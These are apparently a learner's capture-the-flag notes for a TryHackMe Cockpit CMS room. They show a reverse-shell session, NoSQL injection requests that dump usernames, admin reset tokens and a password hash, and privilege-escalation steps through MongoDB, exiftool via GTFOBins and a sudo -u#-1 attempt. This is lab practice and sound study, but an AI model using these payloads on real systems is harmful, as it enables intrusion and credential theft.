# One grep -r of my tryhackme notes demonstrated I have never done sqlite at all.
# So being that I thought maybe it was just one flag, and I only have 1.5 hours (post scanning to see how far I can get), moved towards uploading a shell
# Also attackbox update and sqlite made everything brainscrappingly unresponsive.
#I worked:

root@ip-10-10-27-122:~# nc -lvnp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.200.228 56966 received!
Linux ubuntu 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 08:13:21 up  1:28,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("bin/bash");'
www-data@ubuntu:/$ export TERM=xterm
export TERM=xterm
www-data@ubuntu:/$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@ip-10-10-27-122:~# stty raw -echo; fg
nc -lvnp 1234

www-data@ubuntu:/$ cat /home/stux/user.txt 
cat: user.txt: Permission denied

www-data@ubuntu:/home/stux$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
stux:x:1000:1000:Coock,,,:/home/stux:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mongodb:x:109:65534::/var/lib/mongodb:/bin/false
clamav:x:110:118::/var/lib/clamav:/bin/false
debian-spamd:x:111:119::/var/lib/spamassassin:/bin/sh
opensmtpd:x:112:120:OpenSMTD Daemon,,,:/var/lib/opensmtpd/empty:/bin/false
opensmtpq:x:113:121:OpenSMTD queue user,,,:/var/lib/opensmtpd/empty:/bin/false

# Day 2, releasing this one will take awhile as I have not interacted with any sqlite at this point
# I re-exploited the cms, downloaded everything from the cms and got a reverse-shell like I did previously
# I saw this write up that caught my eye:
# https://p1xxxel.github.io/posts/cmspit-writeup/
# Advertised as  NoSql injection into RCE 
# Seeing as my sqlinjection could be much much better and I rather learn and practice new stuff
# And pick up new or better ways, this writeup becomes a walkthrough.
# And just uploaded the shell script this time, but I was something I learnt from another CTF so trying
# it on the fly with bearly any of my own artifical time-limit left, it seemed like somethin just to try.


[+] The New credentials for admin is: 
         Username : admin 
         Password : ;`*v$T-diP

# Read Writeup
# Read https://swarm.ptsecurity.com/rce-cockpit-cms/

Instead of using burpsuite I will use curl; before see what burp does

First attempt 
# -X form type, -d data '', -H Header information, I replace th e \n with &  
curl -X POST -d '{ "admin":{"$func":"var_dump"}' -H 'Content-Type: application/json\nContent-Length: 40' http://10.10.161.253/auth/requestreset
# Sorted of failed, not getting the full output
{"error":"User required"}

# This is burp version:

POST /auth/requestreset HTTP/1.1
Host: 10.10.161.253
Content-Type: application/json
Content-Length: 46

{ 
        "user":{
                "$func":"var_dump"
        }
}


HTTP/1.0 404 Not Found
Date: Fri, 11 Mar 2022 11:32:02 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: 8071dec2be26139e39a170762581c00f=51evd22aonsn1ht1k4mba4otlg; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 114
Connection: close
Content-Type: application/json

string(5) "admin"
string(12) "darkStar7471"
string(5) "skidy"
string(8) "ekoparty"
{"error":"User does not exist"}

# Learning to curl my way to victory!
# Burp curl version:

curl -i -s -k -X $'POST' \
    -H $'Host: 10.10.161.253' -H $'Content-Type: application/json' -H $'Content-Length: 46' \
    --data-binary $'{ \x0d\x0a\x09\"user\":{\x0d\x0a\x09\x09\"$func\":\"var_dump\"\x0d\x0a\x09}\x0d\x0a}\x0d\x0a\x0d\x0a' \
    $'http://10.10.161.253/auth/requestreset'

# Seperate -Hs
# include the response headers in output -i 
# Got some wacky 500 and 400s status code
# Gained great appreciation for curl and burp

# To replicate the exploit without the python exploit 
# Considering that the script I ran does stuff to file system of the token
# I reset the machine

POST /auth/resetpassword HTTP/1.1
Host: 10.10.161.253
Content-Type: application/json
Content-Length: 39

{       "token":{               "$func":"var_dump"      }}

HTTP/1.0 404 Not Found
Date: Fri, 11 Mar 2022 11:32:38 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: 8071dec2be26139e39a170762581c00f=npdmckotlas3qgeqk4bsd0o544; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 106
Connection: close
Content-Type: text/html;charset=UTF-8

string(48) "rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23"
{"error": "404", "message":"File not found"}


# Use the token to get a new password

POST /auth/newpassword HTTP/1.1
Host: 10.10.175.206
Content-Type: application/json
Content-Length: 65

{
"token":"rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23"
}


HTTP/1.0 200 OK
Date: Fri, 11 Mar 2022 11:34:10 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: 8071dec2be26139e39a170762581c00f=pf23r9a0utq0govi6j16u11aou; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4200
Connection: close
Content-Type: text/html;charset=UTF-8

<!doctype html>
<html lang="en" class="uk-height-1-1 app-page-newpassword" data-base="/" data-route="/" data-locale="en">
<head>
    <meta charset="UTF-8">
    <title>Password Reset!</title>
    <link rel="icon" href="/favicon.png" type="image/png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <link href="/assets/app/css/style.css?ver=0.11.1" type="text/css" rel="stylesheet">
<script src="/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1" type="text/javascript"></script>    <script src="/storage/tmp/4cc5a0d2487ec7f4c75b0cc9115bf601.js?ver=0.11.1" type="text/javascript"></script>
    <style>

        .container {
            width: 420px;
            max-width: 90%;
        }

        .uk-panel-box-header {
            border-bottom: none;
        }

        .newpassword-dialog {
            box-shadow: 0 30px 75px 0 rgba(10, 25, 41, 0.2);
        }

        svg path,
        svg rect,
        svg circle {
            fill: currentColor;
        }

    </style>

</head>
<body class="newpassword-page uk-height-viewport uk-flex uk-flex-middle uk-flex-center">

    <div class="uk-position-relative container uk-animation-scale" riot-view>

        <form class="uk-form" method="post" action="/auth/check" onsubmit="{ submit }">

            <div id="newpassword-dialog" class="newpassword-dialog uk-panel-box uk-panel-space uk-panel-card uk-nbfc" show="{!$user}">

                <div name="header" class="uk-panel-box-header uk-text-bold uk-text-center">

                    <p>
                        <img src="/assets/app/media/icons/password-reset.svg" width="80" height="80" alt="" />
                    </p>

                    <h2 class="uk-text-bold uk-text-truncate"><span>Cockpit</span></h2>

                    <p class="uk-text-bold">{ user.name || user.user}</p>

                    <div class="uk-animation-shake uk-margin-top" if="{ error }">
                        <strong>{ error }</strong>
                    </div>
                </div>

                <div class="uk-text-center uk-animation-slide-bottom" if="{ reset }">
                    <a class="uk-button uk-button-outline uk-button-large uk-button-primary uk-width-1-1" href="/auth/login">Back to Login</a>
                </div>

                <div class="uk-form-row" show="{ !reset }">
                    <input ref="password" class="uk-form-large uk-width-1-1 uk-text-center" type="password" placeholder="New Password" autofocus required>
                </div>

                <div class="uk-margin-top" show="{ !reset }">
                    <button class="uk-button uk-button-outline uk-button-large uk-text-primary uk-width-1-1">Reset</button>
                </div>
            </div>

        </form>


        <script type="view/script">

            this.error = false;
            this.reset = false;
            this.user  = {"user":"admin","name":"Admin","email":"admin@yourdomain.de","active":true,"group":"admin","password":"$2y$10$dChrF2KNbWuib\/5lW1ePiegKYSxHeqWwrVC.FN5kyqhIsIdbtnOjq","i18n":"en","_created":1621655201,"_modified":1621655201,"_id":"60a87ea165343539ee000300","_reset_token":"rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23","md5email":"a11eea8bf873a483db461bb169beccec"};

            submit(e) {

                e.preventDefault();

                this.error = false;
                this.reset = false;

                App.request('/auth/resetpassword', {
                    token: 'rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23',
                    password:this.refs.password.value
                }).then(function(data){

                    this.reset = true;
                    this.update();

                }.bind(this)).catch(function(data) {

                    this.error = 'Reset failed';

                    App.$('#login-dialog').removeClass('uk-animation-shake');

                    setTimeout(function(){
                        App.$('#newpassword-dialog').addClass('uk-animation-shake');
                    }, 50);

                    this.update();

                }.bind(this));

                return false;
            }

        </script>

    </div>

</body>
</html>

# The toek belongs to admin user

# The important part for the next task:

               App.request('/auth/resetpassword', {
                    token: 'rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23',
                    password:this.refs.password.value
                }

# Followed along and tried:

POST /auth/resetpassword HTTP/1.1
Host: 10.10.175.206
Content-Type: application/json
Content-Length: 88

{
"token":"rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23"
"password":"Password1"
}

# But:

HTTP/1.0 412 Precondition Failed
Date: Fri, 11 Mar 2022 11:48:26 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: 8071dec2be26139e39a170762581c00f=oiqkctuugpvkkujik7tc9jod44; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 26
Connection: close
Content-Type: application/json

{"error":"Token required"}

I tried the exploit and this the admin reset token is and none of the others:

rp-4f86eff313a0fe6b3913df692d00af3b622b3975ccad0


# Reset later:
# got all of these tokens:

string(48) "rp-4f86eff313a0fe6b3913df692d00af3b622b3975ccad0"
string(48) "rp-2a626eb819637e3918b2b5271f20e975622b39bf7274a"
string(48) "rp-e05bd098c5196c90c1975e73364ee080622b39ac72d24"
string(48) "rp-00028e3071b1e3357627a0b409f32a51622b39cf69167"
{"error": "404", "message":"File not found"}

# I tried with all of these token and still get 

Token required error

# Watched a bit of the Motasem Hamdam video
# As well as went back a read the PT swarm - !! Prioritisation lesson 101 slap in the face.
# I could have found this when I looked up the exploit the first time.
# More information is good sometimes.
# REREAD:

https://swarm.ptsecurity.com/rce-cockpit-cms/

# Continuing on well read and rested
# Linpeas I avoid so, to find the PrivEsc is the service that is listening on 27017

www-data@ubuntu:/home/stux$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:27017         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      1 10.10.88.100:59220      104.16.218.84:443       SYN_SENT    on (1.56/4/0)

root@ip-10-10-177-84:~# nmap -sC -sV -p 27017 10.10.88.100

Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-12 15:02 GMT
Nmap scan report for ip-10-10-88-100.eu-west-1.compute.internal (10.10.88.100)
Host is up (0.00027s latency).

PORT      STATE  SERVICE VERSION
27017/tcp closed mongod
MAC Address: 02:46:05:76:3D:B5 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds

# I then reran normal scans just to check this if I was a T -4 issue..
# It is because I did not read that it is closed!
# I will now configure settings of scans henceforth 

# Meanwhile searched for Mongodb:

www-data@ubuntu:/$ find / -type d -name "*mongo*" 2>/dev/null
/usr/share/doc/mongodb-server
/usr/share/doc/mongodb-clients
/usr/share/doc/mongodb
/var/www/html/cockpit/lib/vendor/mongodb
/var/www/html/cockpit/lib/vendor/mongodb/mongodb
/var/log/mongodb
/var/lib/mongodb
/sys/fs/cgroup/devices/system.slice/mongodb.service
/sys/fs/cgroup/systemd/system.slice/mongodb.service

# Poked around the file system read administrating mongodb and followed the write-up

https://docs.mongodb.com/mongodb-shell/#connect-to-a-mongodb-deployment
"The MongoDB Shell versus the Legacy mongo Shell

The new MongoDB Shell, mongosh, offers numerous advantages over the legacy mongo shell, such as:

    Improved syntax highlighting.
    Improved command history.
    Improved logging.

Currently mongosh supports a subset of the mongo shell methods. Achieving feature parity between mongosh and the mongo shell is an ongoing effort."


www-data@ubuntu:/tmp$ mongo
MongoDB shell version: 2.6.10
connecting to: test
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
        http://docs.mongodb.org/
Questions? Try the support group
        http://groups.google.com/group/mongodb-user
2022-03-12T07:07:40.450-0800 In File::open(), ::open for '' failed with errno:2 No such file or directory
> show dbs
admin         (empty)
local         0.078GB
sudousersbak  0.078GB
> use sudousersbak
switched to db sudousersbak
> show collections
flag
system.indexes
user
> db.user.find()
{ "_id" : ObjectId("60a89d0caadffb0ea68915f9"), "name" : "p4ssw0rdhack3d!123" }
{ "_id" : ObjectId("60a89dfbaadffb0ea68915fa"), "name" : "stux" }
> db.flag.find()
{ "_id" : ObjectId("60a89f3aaadffb0ea68915fb"), "name" : "thm{c3d1af8da23926a30b0c8f4d6ab71bf851754568}" }


stux@ubuntu:~$ cat .bash_history
exit
sudo passwd stux 
exit
ls
cd /root/
ls
nano root.txt 
ls
ls -la
exit

# Possibility 1: sudo is the vulnerable binary 

stux@ubuntu:~$ sudo -V
Sudo version 1.8.16
Sudoers policy plugin version 1.8.16
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.16
stux@ubuntu:~$ visudo
visudo: /etc/sudoers: Permission denied

# Even though this is not the intended way I will try this afterwards
linux/local/47502.py

stux@ubuntu:~$ sudo -l
Matching Defaults entries for stux on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User stux may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/local/bin/exiftool

# From GTFObins
LFILE=file_to_write
INPUT=input_file
sudo exiftool -filename=$LFILE $INPUT

https://nvd.nist.gov/vuln/detail/CVE-2021-22204
used djvumake:


# Now for the linux/local/47502.py exploit
stux@ubuntu:/tmp$ sudo -u#-1 /bin/bash
sudo: unknown user: #-1
sudo: unable to initialize policy plugin
# The more you know and try :)
